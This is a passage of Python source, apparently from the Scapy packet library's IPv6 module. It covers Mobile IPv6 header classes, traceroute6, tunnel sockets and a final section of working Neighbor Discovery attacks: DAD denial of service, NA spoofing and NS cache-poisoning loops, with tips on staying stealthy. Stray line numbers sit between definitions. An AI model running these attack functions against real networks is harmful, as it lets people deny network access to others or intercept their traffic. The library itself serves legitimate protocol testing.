class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
    """Mobility Header message whose content is kept as a raw string."""
    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteEnumField("mhtype", None, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   # 'len' counts 8-byte units excluding the first 8
                   # bytes (see _MobilityHeader.post_build()): the whole
                   # header is 8 * len + 8 bytes long, 6 of which are
                   # taken by the fields above.
                   StrLenField("msg", b"\x00" * 2,
                               length_from=lambda pkt: 8 * pkt.len + 2)]
3081
3082
class MIP6MH_BRR(_MobilityHeader):
    """Mobility Header Binding Refresh Request message (mhtype 0)."""
    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 0, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("res2", None),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField(
            "options", [], MIP6OptUnknown, 8,
            length_from=lambda pkt: 8 * pkt.len,
        ),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return a constant value."""
        # Hack: the value is a constant on purpose. According to the
        #       original note, BRR, BU and BA share it because BA must
        #       be matched with BU and BU with BRR. --arno
        shared_hash = b"\x00\x08\x09"
        return shared_hash
3101
3102
class MIP6MH_HoTI(_MobilityHeader):
    """Mobility Header Home Test Init message (mhtype 1)."""
    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 1, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrFixedLenField("reserved", b"\x00" * 2, 2),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField(
            "options", [], MIP6OptUnknown, 16,
            length_from=lambda pkt: 8 * (pkt.len - 1),
        ),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the cookie, as bytes."""
        cookie = self.cookie
        return bytes_encode(cookie)
3119
3120
class MIP6MH_CoTI(MIP6MH_HoTI):
    """Mobility Header Care-of Test Init message: same fields as
    MIP6MH_HoTI, with 'mhtype' set to 2 at class level."""
    name = "IPv6 Mobility Header - Care-of Test Init"
    mhtype = 2

    def hashret(self):
        """Return the cookie, as bytes."""
        cookie = self.cookie
        return bytes_encode(cookie)
3127
3128
class MIP6MH_HoT(_MobilityHeader):
    """Mobility Header Home Test message (mhtype 3)."""
    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 3, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("index", None),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        StrFixedLenField("token", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField(
            "options", [], MIP6OptUnknown, 24,
            length_from=lambda pkt: 8 * (pkt.len - 2),
        ),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the cookie, as bytes."""
        cookie = self.cookie
        return bytes_encode(cookie)

    def answers(self, other):
        """Return 1 if other is a HoTI carrying the same cookie, else 0."""
        if not isinstance(other, MIP6MH_HoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0
3152
3153
class MIP6MH_CoT(MIP6MH_HoT):
    # Same layout as the Home Test message, with mhtype set to 4.
    name = "IPv6 Mobility Header - Care-of Test"
    mhtype = 4

    def hashret(self):
        """Return the cookie, passed through bytes_encode, as hash key."""
        cookie = self.cookie
        return bytes_encode(cookie)

    def answers(self, other):
        """Return 1 if other is a Care-of Test Init with our cookie, else 0."""
        if not isinstance(other, MIP6MH_CoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0
3166
3167
class LifetimeField(ShortField):
    def i2repr(self, pkt, x):
        """Display the value multiplied by 4, followed by " sec"."""
        seconds = 4 * x
        return "%d sec" % seconds
3171
3172
class MIP6MH_BU(_MobilityHeader):
    # Binding Update message: the "mhtype" field defaults to 5.
    # fields_desc lists the header fields in order; do not rearrange them.
    name = "IPv6 Mobility Header - Binding Update"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
                   ByteEnumField("mhtype", 5, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   XShortField("seq", None),  # TODO: ShortNonceField
                   # 7 flag bits + 9 reserved bits share one 16-bit word
                   FlagsField("flags", "KHA", 7, "PRMKLHA"),
                   XBitField("reserved", 0, 9),
                   LifetimeField("mhtime", 3),  # unit == 4 seconds
                   # The fixed fields above add up to 12 bytes, which matches
                   # the 12 handed to _OptionsField below; the options are
                   # sized as 8 * len - 4 bytes.
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
                   _OptionsField("options", [], MIP6OptUnknown, 12,
                                 length_from=lambda pkt: 8 * pkt.len - 4)]
    # NOTE(review): presumably makes an underlying IPv6 layer default to
    # next header 135 -- confirm against Packet.overload_fields semantics.
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
        return b"\x00\x08\x09"

    def answers(self, other):
        # A Binding Update is treated as the answer to any Binding Refresh
        # Request; no further field is compared. Returns 1 or 0.
        if isinstance(other, MIP6MH_BRR):
            return 1
        return 0
3196
3197
class MIP6MH_BA(_MobilityHeader):
    # Binding Acknowledgement message: the "mhtype" field defaults to 6.
    # fields_desc lists the header fields in order; do not rearrange them.
    name = "IPv6 Mobility Header - Binding ACK"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
                   ByteEnumField("mhtype", 6, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   ByteEnumField("status", 0, bastatus),
                   # 3 flag bits + 5 reserved bits share one byte
                   FlagsField("flags", "K", 3, "PRK"),
                   XBitField("res2", None, 5),
                   XShortField("seq", None),  # TODO: ShortNonceField
                   XShortField("mhtime", 0),  # unit == 4 seconds
                   # The fixed fields above add up to 12 bytes, which matches
                   # the 12 handed to _OptionsField below; the options are
                   # sized as 8 * len - 4 bytes.
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
                   _OptionsField("options", [], MIP6OptUnknown, 12,
                                 length_from=lambda pkt: 8 * pkt.len - 4)]
    # NOTE(review): presumably makes an underlying IPv6 layer default to
    # next header 135 -- confirm against Packet.overload_fields semantics.
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
        return b"\x00\x08\x09"

    def answers(self, other):
        # A Binding ACK answers a Binding Update when both carry their
        # expected mhtype, the tested flag bit of the BU is set and the
        # sequence numbers are equal. Returns 1 on match, 0 otherwise.
        # NOTE(review): the BU flag names are "PRMKLHA"; if FlagsField
        # assigns names starting from the least significant bit, 0x1 selects
        # 'P' rather than the Ack request flag 'A' -- confirm the mask.
        if (isinstance(other, MIP6MH_BU) and
            other.mhtype == 5 and
            self.mhtype == 6 and
            other.flags & 0x1 and  # Ack request flags is set
                self.seq == other.seq):
            return 1
        return 0
3226
3227
# Status code -> description table used as the enumeration of the "status"
# field of the Binding Error message (MIP6MH_BE).
_bestatus = {1: 'Unknown binding for Home Address destination option',
             2: 'Unrecognized MH Type value'}
3230
3231# TODO: match Binding Error to its stimulus
3232
3233
class MIP6MH_BE(_MobilityHeader):
    # Binding Error message: the "mhtype" field defaults to 7.
    # fields_desc lists the header fields in order; do not rearrange them.
    # No hashret()/answers() is defined here, so whatever the base class
    # provides applies.
    name = "IPv6 Mobility Header - Binding Error"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
                   ByteEnumField("mhtype", 7, mhtypes),
                   ByteField("res", 0),
                   XShortField("cksum", None),
                   ByteEnumField("status", 0, _bestatus),
                   ByteField("reserved", 0),
                   IP6Field("ha", "::"),
                   # The fixed fields above add up to 24 bytes, which matches
                   # the 24 handed to _OptionsField below; the options are
                   # sized as 8 * (len - 2) bytes. Unlike the sibling
                   # messages, no autopad field is declared here.
                   _OptionsField("options", [], MIP6OptUnknown, 24,
                                 length_from=lambda pkt: 8 * (pkt.len - 2))]
    # NOTE(review): presumably makes an underlying IPv6 layer default to
    # next header 135 -- confirm against Packet.overload_fields semantics.
    overload_fields = {IPv6: {"nh": 135}}
3247
3248
# Maps a Mobility Header type value (the "mhtype" field) to the packet class
# declared for it. Types 0 to 7 are covered.
# NOTE(review): presumably consulted when dissecting a Mobility Header to
# pick the concrete class -- confirm against the users of this table.
_mip6_mhtype2cls = {0: MIP6MH_BRR,
                    1: MIP6MH_HoTI,
                    2: MIP6MH_CoTI,
                    3: MIP6MH_HoT,
                    4: MIP6MH_CoT,
                    5: MIP6MH_BU,
                    6: MIP6MH_BA,
                    7: MIP6MH_BE}
3257
3258
3259#############################################################################
3260#############################################################################
3261#                               Traceroute6                                 #
3262#############################################################################
3263#############################################################################
3264
class AS_resolver6(AS_resolver_riswhois):
    def _resolve_one(self, ip):
        """
        Overloaded version to provide a Whois resolution on the
        embedded IPv4 address if the address is 6to4 or Teredo.
        Otherwise, the native IPv6 address is passed.

        ip: the IPv6 address to resolve (printable form).

        Returns a (ip, asn, desc) tuple. The original IPv6 address is
        always returned as first element, even when the lookup was made on
        an embedded IPv4 address. asn is converted to an int when it looks
        like "AS<number>"; otherwise it is returned exactly as provided by
        the parent resolver (including None when no AS number was found).
        """

        if in6_isaddr6to4(ip):  # for 6to4, use embedded @
            tmp = inet_pton(socket.AF_INET6, ip)
            addr = inet_ntop(socket.AF_INET, tmp[2:6])
        elif in6_isaddrTeredo(ip):  # for Teredo, use mapped address
            addr = teredoAddrExtractInfo(ip)[2]
        else:
            addr = ip

        _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)

        # The lookup may not yield any AS number: do not call a str method
        # on a missing value, just hand it back to the caller untouched.
        if asn is not None and asn.startswith("AS"):
            try:
                asn = int(asn[2:])
            except ValueError:
                # Not "AS" followed by digits: keep the raw string
                pass

        return ip, asn, desc
3290
3291
class TracerouteResult6(TracerouteResult):
    __slots__ = []

    def show(self):
        """
        Build, through make_table(), one table cell per (probe, answer)
        couple: column is the probed destination/port, row is the hop
        limit, cell is the answering source and the kind of answer.
        """
        # TODO: ICMPv6 !
        probe_fmt = "%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"  # noqa: E501
        answer_fmt = ("%-42s,IPv6.src% {TCP:%TCP.flags%}"
                      "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"  # noqa: E501
                      "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"  # noqa: E501
                      "{ICMPv6EchoReply:%ir,type%}")

        def _cell(s, r):
            return s.sprintf(probe_fmt), s.hlim, r.sprintf(answer_fmt)

        return self.make_table(_cell)

    def get_trace(self):
        """
        Return a dict mapping each probed destination to a dict
        {hop limit: (answering source address, final)}, where final is
        False when the answer is one of the ICMPv6 error messages below.
        Entries beyond the lowest hop limit with a final answer are removed.
        """
        icmp_errors = (ICMPv6TimeExceeded, ICMPv6DestUnreach,
                       ICMPv6PacketTooBig, ICMPv6ParamProblem)
        trace = {}

        for snd, rcv in self.res:
            if IPv6 not in snd:
                continue
            hops = trace.setdefault(snd[IPv6].dst, {})
            is_error = any(layer in rcv for layer in icmp_errors)
            hops[snd[IPv6].hlim] = rcv[IPv6].src, not is_error

        for hops in six.itervalues(trace):
            final_ttls = [ttl for ttl, info in six.iteritems(hops) if info[1]]
            if not final_ttls:
                # Destination never gave a final answer: keep everything
                continue
            first_final = min(final_ttls)
            # Iterate on a copy of the keys: hops is modified in the loop
            for ttl in list(hops):
                if ttl > first_final:
                    del hops[ttl]

        return trace

    def graph(self, ASres=AS_resolver6(), **kargs):
        """Call TracerouteResult.graph() with an IPv6 aware AS resolver."""
        TracerouteResult.graph(self, ASres=ASres, **kargs)
3333
3334
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
                l4=None, timeout=2, verbose=None, **kargs):
    """Instant TCP traceroute using IPv6
    traceroute6(target, [maxttl=30], [dport=80], [sport=80])

    One probe is sent per hop limit in [minttl, maxttl]. When l4 is given,
    it is used as payload of the IPv6 probes instead of the default TCP
    segment. Remaining keyword arguments are handed to sr().

    Returns the couple (TracerouteResult6 of the answered probes,
    unanswered probes as returned by sr()).
    """
    if verbose is None:
        verbose = conf.verb

    probe = IPv6(dst=target, hlim=(minttl, maxttl))
    if l4 is not None:
        answered, unanswered = sr(probe / l4,
                                  timeout=timeout, verbose=verbose, **kargs)
    else:
        segment = TCP(seq=RandInt(), sport=sport, dport=dport)
        answered, unanswered = sr(probe / segment,
                                  timeout=timeout, filter="icmp6 or tcp",
                                  verbose=verbose, **kargs)

    result = TracerouteResult6(answered.res)

    if verbose:
        result.display()

    return result, unanswered
3357
3358#############################################################################
3359#############################################################################
3360#                                  Sockets                                  #
3361#############################################################################
3362#############################################################################
3363
3364
class L3RawSocket6(L3RawSocket):
    # Layer 3 raw socket for IPv6: emission goes through an AF_INET6 raw
    # socket, reception through an AF_PACKET raw socket bound to `type`.
    def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):  # noqa: E501
        # `nofilter` is accepted but not used in this constructor.
        L3RawSocket.__init__(self, type, filter, iface, promisc)
        # NOTE(review): outs/ins are (re)assigned below; if the parent
        # constructor already opened sockets under these names, they are
        # dropped here without an explicit close() -- confirm.
        # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)  # noqa: E501
        self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)  # noqa: E501
        self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))  # noqa: E501
3371
3372
def IPv6inIP(dst='203.178.135.36', src=None):
    """
    Configure the _IPv6inIP socket class and return it.

    dst and src are stored on the class as the IPv4 tunnel endpoints. If
    conf.L3socket is not already _IPv6inIP, it is remembered as the worker
    socket class; otherwise the conf.L3socket attribute is deleted.
    """
    _IPv6inIP.dst = dst
    _IPv6inIP.src = src
    if conf.L3socket == _IPv6inIP:
        del conf.L3socket
    else:
        _IPv6inIP.cls = conf.L3socket
    return _IPv6inIP
3381
3382
class _IPv6inIP(SuperSocket):
    # Tunnel endpoints and worker socket class; set at class level
    # (see IPv6inIP() and set()).
    dst = '127.0.0.1'
    src = None
    cls = None

    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):  # noqa: E501
        """Create the socket and its worker (an instance of self.cls)."""
        SuperSocket.__init__(self, family, type, proto)
        self.worker = self.cls(**args)

    def set(self, dst, src=None):
        """Change the tunnel endpoints (stored on the class itself)."""
        _IPv6inIP.dst = dst
        _IPv6inIP.src = src

    def nonblock_recv(self):
        """Non blocking receive on the worker, then decapsulation."""
        return self._recv(self.worker.nonblock_recv())

    def recv(self, x):
        """Receive on the worker, then decapsulation."""
        return self._recv(self.worker.recv(x), x)

    def _recv(self, p, x=MTU):
        """
        Return the IPv6 payload of p when p is an IP packet coming from the
        tunnel endpoint with IPv6 as protocol; otherwise return p as is.
        """
        if p is None or not isinstance(p, IP):
            return p
        # TODO: verify checksum
        from_tunnel = (p.src == self.dst and
                       p.proto == socket.IPPROTO_IPV6 and
                       isinstance(p.payload, IPv6))
        return p.payload if from_tunnel else p

    def send(self, x):
        """Send x through the worker, encapsulated in an IP packet."""
        outer = IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)
        return self.worker.send(outer / x)
3416
3417
3418#############################################################################
3419#############################################################################
3420#                    Neighbor Discovery Protocol Attacks                    #
3421#############################################################################
3422#############################################################################
3423
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
                        tgt_filter=None, reply_mac=None):
    """
    Internal generic helper accepting a specific callback as first argument,
    for NS or NA reply. See the two specific functions below.

    reply_callback: called as reply_callback(req, reply_mac, iface) for
         each sniffed packet accepted by the DAD NS checks.

    iface: interface to sniff on; conf.iface is used when not provided.

    mac_src_filter: when set, only NS sent from that source mac address
         are considered.

    tgt_filter: when set, only NS whose target address is that IPv6 address
         are considered. The address can be given in printable form (e.g.
         "2001:db8::1") or already packed in network format.

    reply_mac: source mac address handed to the callback; also excluded
         from the capture to avoid sniffing our own traffic. Defaults to
         the mac address of iface.
    """

    def pack_tgt_filter(addr):
        """
        Return the filter address in packed form so that it can be compared
        with the packed target address of received NS.
        """
        if not addr:
            return addr
        try:
            return inet_pton(socket.AF_INET6, addr)
        except (socket.error, ValueError, TypeError):
            # Not a printable IPv6 address: assume the caller already
            # provided the packed form and keep it untouched.
            return addr

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        # Get and compare the MAC address
        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must be the unspecified address
        if req[IPv6].src != "::":
            return 0

        # Check destination is the link-local solicited-node multicast
        # address associated with target address in received NS
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0
        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
        expected_snma = in6_getnsma(tgt)
        if received_snma != expected_snma:
            return 0

        return 1

    if not iface:
        iface = conf.iface

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    # Compare packed addresses with packed addresses: a printable filter
    # would otherwise never be equal to the packed target of a NS.
    tgt_filter = pack_tgt_filter(tgt_filter)

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, iface),
          iface=iface)
3474
3475
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756: listen for incoming NS messages sent from the unspecified address
    and answer each of them with a NS for the same target address, so that
    the peer believes another node is also performing DAD for that address.

    The fake NS emitted for each received NS uses:
     - target address: the target address found in the received NS.
     - IPv6 source address: the unspecified address (::).
     - IPv6 destination address: the destination of the received NS, i.e.
       the link-local solicited-node multicast address derived from the
       target address.
     - source mac address: the one of the interface (or reply_mac, see
       below).
     - destination mac address: the multicast mac address derived from the
       solicited-node multicast address used as IPv6 destination.

    The behavior can be tuned with the following arguments:

    iface: interface (e.g. "eth0") on which the DoS is launched. When None
         is provided, conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69"). Only NS
         messages received from this source trigger replies, which limits
         the DoS to a single victim. Default is None: no restriction on
         the source mac address.

    tgt_filter: same idea, for a specific target IPv6 address. A fake reply
         is sent only if the target address in the NS message (not its IPv6
         destination address) matches that address.

    reply_mac: source mac address to use for the reply instead of the mac
         address of the interface.
    """

    def ns_reply_callback(req, reply_mac, iface):
        """
        Answer the received NS with a similar NS
        """
        victim_mac = req[Ether].src
        target = req[ICMPv6ND_NS].tgt

        # Mirror the request: same destination, same target, :: as source
        l2 = Ether(src=reply_mac)
        l3 = IPv6(src="::", dst=req[IPv6].dst)
        sendp(l2 / l3 / ICMPv6ND_NS(tgt=target), iface=iface, verbose=0)

        print("Reply NS for target address %s (received from %s)" % (target, victim_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3530
3531
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756: listen for incoming NS messages *sent from the unspecified
    address* and answer each of them with a NA for the target address, so
    that the peer believes the address is already in use.

    The fake NA emitted for each received NS uses:
     - target address: the target address found in the received NS.
     - IPv6 source address: the target address found in the received NS.
     - IPv6 destination address: the destination of the received NS, i.e.
       the link-local solicited-node multicast address derived from the
       target address.
     - source mac address: the one of the interface (or reply_mac, see
       below).
     - destination mac address: the multicast mac address derived from the
       solicited-node multicast address used as IPv6 destination.
     - a Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
       with the mac address used as source of the NA.

    The behavior can be tuned with the following arguments:

    iface: interface (e.g. "eth0") on which the DoS is launched. When None
         is provided, conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69"). Only NS
         messages received from this source trigger replies, which limits
         the DoS to a single victim. Default is None: no restriction on
         the source mac address.

    tgt_filter: same idea, for a specific target IPv6 address. A fake reply
         is sent only if the target address in the NS message (not its IPv6
         destination address) matches that address.

    reply_mac: source mac address to use for the reply instead of the mac
         address of the interface. It is also the address placed in the
         Target Link-Layer Address option.
    """

    def na_reply_callback(req, reply_mac, iface):
        """
        Answer the received NS with a NA
        """
        victim_mac = req[Ether].src
        target = req[ICMPv6ND_NS].tgt

        # NA claiming the target: sent from the target address to the
        # destination of the NS, Override flag set.
        headers = Ether(src=reply_mac) / IPv6(src=target, dst=req[IPv6].dst)
        advert = ICMPv6ND_NA(tgt=target, S=0, R=0, O=1)  # noqa: E741
        lladdr_opt = ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
        sendp(headers / advert / lladdr_opt, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (target, victim_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3591
3592
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
                           reply_mac=None, router=False):
    """
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor Advertisement
    is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function send
    advertisements in response to received NS (NS sent as part of the DAD,
    i.e. with an unspecified address as source, are not considered).

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address
     - as IPv6 destination address: the source IPv6 address of received NS
       message.
     - the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination macs address
       of the emitted NA.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
       filled with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS. The address
         can be given in printable form (e.g. "2001:db8::1") or already
         packed in network format.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.

    router: by the default (False) the 'R' flag in the NA used for the reply
         is not set. If the parameter is set to True, the 'R' flag in the
         NA is set, advertising us as a router.

    Please, keep the following in mind when using the function: for obvious
    reasons (kernel space vs. Python speed), when the target of the address
    resolution is on the link, the sender of the NS receives 2 NA messages
    in a row, the valid one and our fake one. The second one will overwrite
    the information provided by the first one, i.e. the natural latency of
    Scapy helps here.

    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come after
    something 20+ ms. On a usual testbed for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
    """

    def pack_tgt_filter(addr):
        """
        Return the filter address in packed form so that it can be compared
        with the packed target address of received NS.
        """
        if not addr:
            return addr
        try:
            return inet_pton(socket.AF_INET6, addr)
        except (socket.error, ValueError, TypeError):
            # Not a printable IPv6 address: assume the caller already
            # provided the packed form and keep it untouched.
            return addr

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must NOT be the unspecified address
        if req[IPv6].src == "::":
            return 0

        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0

        dst = req[IPv6].dst
        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.

            # If this is a real address resolution NS, then the destination
            # address of the packet is the link-local solicited node multicast
            # address associated with the target of the NS.
            # Otherwise, the NS is a NUD related one, i.e. the peer is
            # unicasting the NS to check the target is still alive (L2
            # information is still in its cache and it is verified)
            received_snma = inet_pton(socket.AF_INET6, dst)
            expected_snma = in6_getnsma(tgt)
            if received_snma != expected_snma:
                print("solicited node multicast @ does not match target @!")
                return 0

        return 1

    def reply_callback(req, reply_mac, router, iface):
        """
        Callback that reply to a NS with a spoofed NA
        """

        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
        # send it back.
        mac = req[Ether].src
        pkt = req[IPv6]
        src = pkt.src
        tgt = req[ICMPv6ND_NS].tgt
        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
        # Use the target field from the NS
        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741

        # "If the solicitation IP Destination Address is not a multicast
        # address, the Target Link-Layer Address option MAY be omitted"
        # Given our purpose, we always include it.
        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)

        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, mac))

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    router = 1 if router else 0  # Value of the R flags in NA

    # Compare packed addresses with packed addresses: a printable filter
    # would otherwise never be equal to the packed target of a NS.
    tgt_filter = pack_tgt_filter(tgt_filter)

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, router, iface),
          iface=iface)
3729
3730
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
                           dst=None, src_mac=None, dst_mac=None, loop=True,
                           inter=1, iface=None):
    """
    Send fake Neighbor Solicitation messages to a victim, in order to either
    create a new entry in its neighbor cache or update an existing one.
    Section 7.2.3 of RFC 4861 states that a node SHOULD create the entry or
    update an existing one (if it is not currently performing DAD for the
    target of the NS). The entry's reachability state is set to STALE.

    The two main parameters are the source link-layer address (carried by
    the Source Link-Layer Address option in the NS) and the source address
    of the packet.

    Unlike some other NDP_Attack_* functions, this one does not follow a
    stimulus/response model: when called, it sends the same NS packet in
    loop, every second by default.

    The format of the packets can be changed with the following arguments:

    src_lladdr: the MAC address placed in the Source Link-Layer Address
         option of the NS. This is the address the peer should associate,
         in its neighbor cache, with the IPv6 source address of the packet.
         When None is provided, the mac address of the interface is used.

    src: the IPv6 source address of the packet. When None is provided, an
         address associated with the emitting interface is used (based on
         the destination address of the packet).

    target: the target address of the NS packet; a dummy address
         (2001:db8::1) is used by default. Unless dst is provided, the
         target decides the destination of the packet: the solicited-node
         multicast address associated with the target is used. Consider
         providing a specific destination address if the target address
         differs from the one of the victim.

    dst: the destination address of the NS. Default is the solicited-node
         multicast address associated with the target address (see above).
         The victim is not expected to check the destination address of
         the packet, so a multicast address like ff02::1 should work to
         target all hosts on the link. On the contrary, to be more stealth,
         provide the address of the victim so that the packet is sent only
         to it.

    src_mac: the MAC address used as source of the packet; the address of
         the interface by default. Use something else to be more stealth.
         Note that this is not the address the victim will use to populate
         its neighbor cache.

    dst_mac: the MAC address used as destination of the packet. If the IPv6
         destination address is multicast (all-nodes, solicited node, ...),
         it will be computed. If it is unicast, a neighbor solicitation
         will be performed to get the associated address. Provide the MAC
         address with this parameter to keep the attack stealth.

    loop: True by default: NS packets are sent in loop, separated by
         'inter' seconds (see below). When False, a single packet is sent.

    inter: interval in seconds between NS packets when loop is True.

    iface: to force the sending interface.
    """

    iface = iface or conf.iface

    # Source link-layer address option: the provided MAC address, or the
    # one of the interface when none is given.
    src_lladdr = src_lladdr or get_if_hwaddr(iface)

    # Only explicitly provided addresses are forced on the layers
    l2_args = {key: val
               for key, val in (("src", src_mac), ("dst", dst_mac)) if val}

    l3_args = {"src": src} if src else {}
    if dst:
        l3_args["dst"] = dst
    else:
        # Default destination: the solicited-node multicast address
        # associated with the target address.
        packed_target = inet_pton(socket.AF_INET6, target)
        l3_args["dst"] = inet_ntop(socket.AF_INET6,
                                   in6_getnsma(packed_target))

    pkt = (Ether(**l2_args) /
           IPv6(**l3_args) /
           ICMPv6ND_NS(tgt=target) /
           ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr))

    sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3836
